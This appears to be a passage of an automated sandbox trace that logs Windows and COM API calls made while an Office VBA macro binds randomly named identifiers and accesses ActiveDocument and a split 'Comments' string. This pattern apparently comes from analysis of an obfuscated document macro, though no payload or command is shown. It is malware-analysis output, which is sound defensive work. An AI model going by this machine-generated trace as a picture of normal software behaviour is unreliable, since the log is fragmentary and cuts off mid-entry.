returned 0x0 [0023.184] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2992, cbMultiByte=8, lpWideCharStr=0x125364, cchWideChar=9 | out: lpWideCharStr="rZCrTyu") returned 8 [0023.184] ITypeComp:RemoteBind (in: This=0x2876bc8, szName="rZCrTyu", lHashVal=0x108c5d, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x24e | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x24e) returned 0x0 [0023.184] CRetailMalloc_Alloc () returned 0x786b818 [0023.184] IUnknown:Release (This=0x2876548) returned 0x5 [0023.184] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x46e00f6, cbMultiByte=15, lpWideCharStr=0x125374, cchWideChar=16 | out: lpWideCharStr="_B_var_rZCrTyu") returned 15 [0023.185] ITypeComp:RemoteBind (in: This=0x2876550, szName="_B_var_rZCrTyu", lHashVal=0x108fe1, wFlags=0x3, ppTInfo=0x125340, pDescKind=0x125350, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0, pDummy=0x1 | out: ppTInfo=0x125340*=0x0, pDescKind=0x125350*=0, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0*=0x0, pDummy=0x1) returned 0x0 [0023.185] CRetailMalloc_Free () returned 0xef90001 [0023.185] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f29b6, cbMultiByte=10, lpWideCharStr=0x125364, cchWideChar=11 | out: lpWideCharStr="gwUYEwFGR") returned 10 [0023.185] ITypeComp:RemoteBind (in: This=0x2876550, szName="gwUYEwFGR", lHashVal=0x106f6e, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x250 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x250) returned 0x0 [0023.185] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f29b6, cbMultiByte=10, lpWideCharStr=0x125364, cchWideChar=11 | out: lpWideCharStr="gwUYEwFGR") returned 10 [0023.185] ITypeComp:RemoteBind (in: This=0x2875638, szName="gwUYEwFGR", lHashVal=0x106f6e, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x250 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x250) returned 0x0 [0023.185] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f29b6, cbMultiByte=10, lpWideCharStr=0x125364, cchWideChar=11 | out: lpWideCharStr="gwUYEwFGR") returned 10 [0023.185] ITypeComp:RemoteBind (in: This=0x2876778, szName="gwUYEwFGR", lHashVal=0x106f6e, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x250 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x250) returned 0x0 [0023.185] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f29b6, cbMultiByte=10, lpWideCharStr=0x125364, cchWideChar=11 | out: lpWideCharStr="gwUYEwFGR") returned 10 [0023.185] ITypeComp:RemoteBind (in: This=0x2876bc8, szName="gwUYEwFGR", lHashVal=0x106f6e, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x250 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x250) returned 0x0 [0023.185] CRetailMalloc_Alloc () returned 0x78b3090 [0023.186] IUnknown:Release (This=0x2876548) returned 0x5 [0023.186] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x46e0122, cbMultiByte=17, lpWideCharStr=0x125374, cchWideChar=18 | out: lpWideCharStr="_B_var_gwUYEwFGR") returned 17 [0023.186] ITypeComp:RemoteBind (in: This=0x2876550, szName="_B_var_gwUYEwFGR", lHashVal=0x1078b3, wFlags=0x3, ppTInfo=0x125340, pDescKind=0x125350, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0, pDummy=0x1 | out: ppTInfo=0x125340*=0x0, pDescKind=0x125350*=0, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0*=0x0, pDummy=0x1) returned 0x0 [0023.186] CRetailMalloc_Free () returned 0x1b20201 [0023.186] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f29de, cbMultiByte=10, lpWideCharStr=0x125364, cchWideChar=11 | out: lpWideCharStr="SdCKBWRmm") returned 10 [0023.186] ITypeComp:RemoteBind (in: This=0x2876550, szName="SdCKBWRmm", lHashVal=0x1028e5, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x252 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x252) returned 0x0 [0023.186] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f29de, cbMultiByte=10, lpWideCharStr=0x125364, cchWideChar=11 | out: lpWideCharStr="SdCKBWRmm") returned 10 [0023.186] ITypeComp:RemoteBind (in: This=0x2875638, szName="SdCKBWRmm", lHashVal=0x1028e5, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x252 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x252) returned 0x0 [0023.186] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f29de, cbMultiByte=10, lpWideCharStr=0x125364, cchWideChar=11 | out: lpWideCharStr="SdCKBWRmm") returned 10 [0023.186] ITypeComp:RemoteBind (in: This=0x2876778, szName="SdCKBWRmm", lHashVal=0x1028e5, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x252 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x252) returned 0x0 [0023.186] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f29de, cbMultiByte=10, lpWideCharStr=0x125364, cchWideChar=11 | out: lpWideCharStr="SdCKBWRmm") returned 10 [0023.186] ITypeComp:RemoteBind (in: This=0x2876bc8, szName="SdCKBWRmm", lHashVal=0x1028e5, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x252 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x252) returned 0x0 [0023.186] CRetailMalloc_Alloc () returned 0x78b3090 [0023.187] IUnknown:Release (This=0x2876548) returned 0x5 [0023.187] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x46e0152, cbMultiByte=17, lpWideCharStr=0x125374, cchWideChar=18 | out: lpWideCharStr="_B_var_SdCKBWRmm") returned 17 [0023.187] ITypeComp:RemoteBind (in: This=0x2876550, szName="_B_var_SdCKBWRmm", lHashVal=0x10322a, wFlags=0x3, ppTInfo=0x125340, pDescKind=0x125350, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0, pDummy=0x1 | out: ppTInfo=0x125340*=0x0, pDescKind=0x125350*=0, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0*=0x0, pDummy=0x1) returned 0x0 [0023.187] CRetailMalloc_Free () returned 0x1b20201 [0023.187] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2a06, cbMultiByte=12, lpWideCharStr=0x125364, cchWideChar=13 | out: lpWideCharStr="dPgDectFAEK") returned 12 [0023.187] ITypeComp:RemoteBind (in: This=0x2876550, szName="dPgDectFAEK", lHashVal=0x100f22, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x254 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x254) returned 0x0 [0023.187] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2a06, cbMultiByte=12, lpWideCharStr=0x125364, cchWideChar=13 | out: lpWideCharStr="dPgDectFAEK") returned 12 [0023.187] ITypeComp:RemoteBind (in: This=0x2875638, szName="dPgDectFAEK", lHashVal=0x100f22, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x254 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x254) returned 0x0 [0023.187] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2a06, cbMultiByte=12, lpWideCharStr=0x125364, cchWideChar=13 | out: lpWideCharStr="dPgDectFAEK") returned 12 [0023.187] ITypeComp:RemoteBind (in: This=0x2876778, szName="dPgDectFAEK", lHashVal=0x100f22, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x254 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x254) returned 0x0 [0023.187] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2a06, cbMultiByte=12, lpWideCharStr=0x125364, cchWideChar=13 | out: lpWideCharStr="dPgDectFAEK") returned 12 [0023.187] ITypeComp:RemoteBind (in: This=0x2876bc8, szName="dPgDectFAEK", lHashVal=0x100f22, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x254 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x254) returned 0x0 [0023.187] CRetailMalloc_Alloc () returned 0x78b3090 [0023.188] IUnknown:Release (This=0x2876548) returned 0x5 [0023.188] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x46e0182, cbMultiByte=19, lpWideCharStr=0x125374, cchWideChar=20 | out: lpWideCharStr="_B_var_dPgDectFAEK") returned 19 [0023.188] ITypeComp:RemoteBind (in: This=0x2876550, szName="_B_var_dPgDectFAEK", lHashVal=0x10f142, wFlags=0x3, ppTInfo=0x125340, pDescKind=0x125350, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0, pDummy=0x1 | out: ppTInfo=0x125340*=0x0, pDescKind=0x125350*=0, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0*=0x0, pDummy=0x1) returned 0x0 [0023.188] CRetailMalloc_Free () returned 0x1b20201 [0023.188] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2a2e, cbMultiByte=8, lpWideCharStr=0x125364, cchWideChar=9 | out: lpWideCharStr="zMZyYEh") returned 8 [0023.188] ITypeComp:RemoteBind (in: This=0x2876550, szName="zMZyYEh", lHashVal=0x10d371, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x256 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x256) returned 0x0 [0023.188] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2a2e, cbMultiByte=8, lpWideCharStr=0x125364, cchWideChar=9 | out: lpWideCharStr="zMZyYEh") returned 8 [0023.188] ITypeComp:RemoteBind (in: This=0x2875638, szName="zMZyYEh", lHashVal=0x10d371, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x256 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x256) returned 0x0 [0023.188] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2a2e, cbMultiByte=8, lpWideCharStr=0x125364, cchWideChar=9 | out: lpWideCharStr="zMZyYEh") returned 8 [0023.188] ITypeComp:RemoteBind (in: This=0x2876778, szName="zMZyYEh", lHashVal=0x10d371, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x256 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x256) returned 0x0 [0023.188] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2a2e, cbMultiByte=8, lpWideCharStr=0x125364, cchWideChar=9 | out: lpWideCharStr="zMZyYEh") returned 8 [0023.188] ITypeComp:RemoteBind (in: This=0x2876bc8, szName="zMZyYEh", lHashVal=0x10d371, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x256 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x256) returned 0x0 [0023.188] CRetailMalloc_Alloc () returned 0x786b818 [0023.189] IUnknown:Release (This=0x2876548) returned 0x5 [0023.189] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x46e01b2, cbMultiByte=15, lpWideCharStr=0x125374, cchWideChar=16 | out: lpWideCharStr="_B_var_zMZyYEh") returned 15 [0023.189] ITypeComp:RemoteBind (in: This=0x2876550, szName="_B_var_zMZyYEh", lHashVal=0x10c774, wFlags=0x3, ppTInfo=0x125340, pDescKind=0x125350, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0, pDummy=0x1 | out: ppTInfo=0x125340*=0x0, pDescKind=0x125350*=0, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0*=0x0, pDummy=0x1) returned 0x0 [0023.189] CRetailMalloc_Free () returned 0xef90001 [0023.189] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2a52, cbMultiByte=10, lpWideCharStr=0x125364, cchWideChar=11 | out: lpWideCharStr="GChpZzBgR") returned 10 [0023.189] ITypeComp:RemoteBind (in: This=0x2876550, szName="GChpZzBgR", lHashVal=0x10e481, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x258 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x258) returned 0x0 [0023.189] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2a52, cbMultiByte=10, lpWideCharStr=0x125364, cchWideChar=11 | out: lpWideCharStr="GChpZzBgR") returned 10 [0023.189] ITypeComp:RemoteBind (in: This=0x2875638, szName="GChpZzBgR", lHashVal=0x10e481, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x258 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x258) returned 0x0 [0023.189] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2a52, cbMultiByte=10, lpWideCharStr=0x125364, cchWideChar=11 | out: lpWideCharStr="GChpZzBgR") returned 10 [0023.189] ITypeComp:RemoteBind (in: This=0x2876778, szName="GChpZzBgR", lHashVal=0x10e481, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x258 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x258) returned 0x0 [0023.190] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2a52, cbMultiByte=10, lpWideCharStr=0x125364, cchWideChar=11 | out: lpWideCharStr="GChpZzBgR") returned 10 [0023.190] ITypeComp:RemoteBind (in: This=0x2876bc8, szName="GChpZzBgR", lHashVal=0x10e481, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x258 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x258) returned 0x0 [0023.190] CRetailMalloc_Alloc () returned 0x78b3090 [0023.190] IUnknown:Release (This=0x2876548) returned 0x5 [0023.190] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x46e01de, cbMultiByte=17, lpWideCharStr=0x125374, cchWideChar=18 | out: lpWideCharStr="_B_var_GChpZzBgR") returned 17 [0023.190] ITypeComp:RemoteBind (in: This=0x2876550, szName="_B_var_GChpZzBgR", lHashVal=0x10edc6, wFlags=0x3, ppTInfo=0x125340, pDescKind=0x125350, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0, pDummy=0x1 | out: ppTInfo=0x125340*=0x0, pDescKind=0x125350*=0, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0*=0x0, pDummy=0x1) returned 0x0 [0023.190] CRetailMalloc_Free () returned 0x1b20201 [0023.190] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2a7a, cbMultiByte=11, lpWideCharStr=0x125364, cchWideChar=12 | out: lpWideCharStr="hkvnTphzVg") returned 11 [0023.190] ITypeComp:RemoteBind (in: This=0x2876550, szName="hkvnTphzVg", lHashVal=0x100a93, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x25a | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x25a) returned 0x0 [0023.190] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2a7a, cbMultiByte=11, lpWideCharStr=0x125364, cchWideChar=12 | out: lpWideCharStr="hkvnTphzVg") returned 11 [0023.190] ITypeComp:RemoteBind (in: This=0x2875638, szName="hkvnTphzVg", lHashVal=0x100a93, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x25a | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x25a) returned 0x0 [0023.190] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2a7a, cbMultiByte=11, lpWideCharStr=0x125364, cchWideChar=12 | out: lpWideCharStr="hkvnTphzVg") returned 11 [0023.190] ITypeComp:RemoteBind (in: This=0x2876778, szName="hkvnTphzVg", lHashVal=0x100a93, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x25a | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x25a) returned 0x0 [0023.191] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2a7a, cbMultiByte=11, lpWideCharStr=0x125364, cchWideChar=12 | out: lpWideCharStr="hkvnTphzVg") returned 11 [0023.191] ITypeComp:RemoteBind (in: This=0x2876bc8, szName="hkvnTphzVg", lHashVal=0x100a93, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x25a | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x25a) returned 0x0 [0023.191] CRetailMalloc_Alloc () returned 0x78b3090 [0023.191] IUnknown:Release (This=0x2876548) returned 0x5 [0023.191] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x46e020e, cbMultiByte=18, lpWideCharStr=0x125374, cchWideChar=19 | out: lpWideCharStr="_B_var_hkvnTphzVg") returned 18 [0023.191] ITypeComp:RemoteBind (in: This=0x2876550, szName="_B_var_hkvnTphzVg", lHashVal=0x1078fd, wFlags=0x3, ppTInfo=0x125340, pDescKind=0x125350, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0, pDummy=0x1 | out: ppTInfo=0x125340*=0x0, pDescKind=0x125350*=0, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0*=0x0, pDummy=0x1) returned 0x0 [0023.191] CRetailMalloc_Free () returned 0x1b20201 [0023.191] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2aa2, cbMultiByte=9, lpWideCharStr=0x125364, cchWideChar=10 | out: lpWideCharStr="SgZmpppR") returned 9 [0023.191] ITypeComp:RemoteBind (in: This=0x2876550, szName="SgZmpppR", lHashVal=0x10d65f, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x25c | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x25c) returned 0x0 [0023.191] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2aa2, cbMultiByte=9, lpWideCharStr=0x125364, cchWideChar=10 | out: lpWideCharStr="SgZmpppR") returned 9 [0023.191] ITypeComp:RemoteBind (in: This=0x2875638, szName="SgZmpppR", lHashVal=0x10d65f, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x25c | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x25c) returned 0x0 [0023.191] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2aa2, cbMultiByte=9, lpWideCharStr=0x125364, cchWideChar=10 | out: lpWideCharStr="SgZmpppR") returned 9 [0023.191] ITypeComp:RemoteBind (in: This=0x2876778, szName="SgZmpppR", lHashVal=0x10d65f, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x25c | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x25c) returned 0x0 [0023.192] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2aa2, cbMultiByte=9, lpWideCharStr=0x125364, cchWideChar=10 | out: lpWideCharStr="SgZmpppR") returned 9 [0023.192] ITypeComp:RemoteBind (in: This=0x2876bc8, szName="SgZmpppR", lHashVal=0x10d65f, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x25c | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x25c) returned 0x0 [0023.192] CRetailMalloc_Alloc () returned 0x786b818 [0023.192] IUnknown:Release (This=0x2876548) returned 0x5 [0023.192] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x46e023e, cbMultiByte=16, lpWideCharStr=0x125374, cchWideChar=17 | out: lpWideCharStr="_B_var_SgZmpppR") returned 16 [0023.192] ITypeComp:RemoteBind (in: This=0x2876550, szName="_B_var_SgZmpppR", lHashVal=0x10ade8, wFlags=0x3, ppTInfo=0x125340, pDescKind=0x125350, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0, pDummy=0x1 | out: ppTInfo=0x125340*=0x0, pDescKind=0x125350*=0, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0*=0x0, pDummy=0x1) returned 0x0 [0023.192] CRetailMalloc_Free () returned 0xef90001 [0023.192] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798698, cbMultiByte=5, lpWideCharStr=0x46f2994, cchWideChar=12 | out: lpWideCharStr="Comme") returned 5 [0023.192] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57986a2, cbMultiByte=3, lpWideCharStr=0x46f29dc, cchWideChar=8 | out: lpWideCharStr="nts") returned 3 [0023.192] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2aca, cbMultiByte=15, lpWideCharStr=0x125364, cchWideChar=16 | out: lpWideCharStr="ActiveDocument") returned 15 [0023.192] ITypeComp:RemoteBind (in: This=0x2876550, szName="ActiveDocument", lHashVal=0x105cd3, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x25e | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x25e) returned 0x0 [0023.193] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2aca, cbMultiByte=15, lpWideCharStr=0x125364, cchWideChar=16 | out: lpWideCharStr="ActiveDocument") returned 15 [0023.193] ITypeComp:RemoteBind (in: This=0x2875638, szName="ActiveDocument", lHashVal=0x105cd3, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x25e | out: ppTInfo=0x125330*=0x569eed4, pDescKind=0x125340*=4, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x25e) returned 0x0 [0023.214] ITypeInfo:RemoteGetTypeAttr (in: This=0x569eed4, ppTypeAttr=0x125344, pDummy=0x1254d0 | out: ppTypeAttr=0x125344, pDummy=0x1254d0*=0x0) returned 0x0 [0023.214] ITypeInfo:LocalReleaseTypeAttr (This=0x569eed4) returned 0x5725de8 [0023.215] ITypeInfo:GetRefTypeInfo (in: This=0x569eed4, hreftype=0x940c, ppTInfo=0x12523c | out: ppTInfo=0x12523c*=0x569eed4) returned 0x0 [0023.215] IUnknown:QueryInterface (in: This=0x569eed4, riid=0x720fb92c*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x125278 | out: ppvObject=0x125278*=0x0) returned 0x80004002 [0023.215] ITypeInfo:RemoteGetTypeAttr (in: This=0x569eed4, ppTypeAttr=0x12527c, pDummy=0x0 | out: 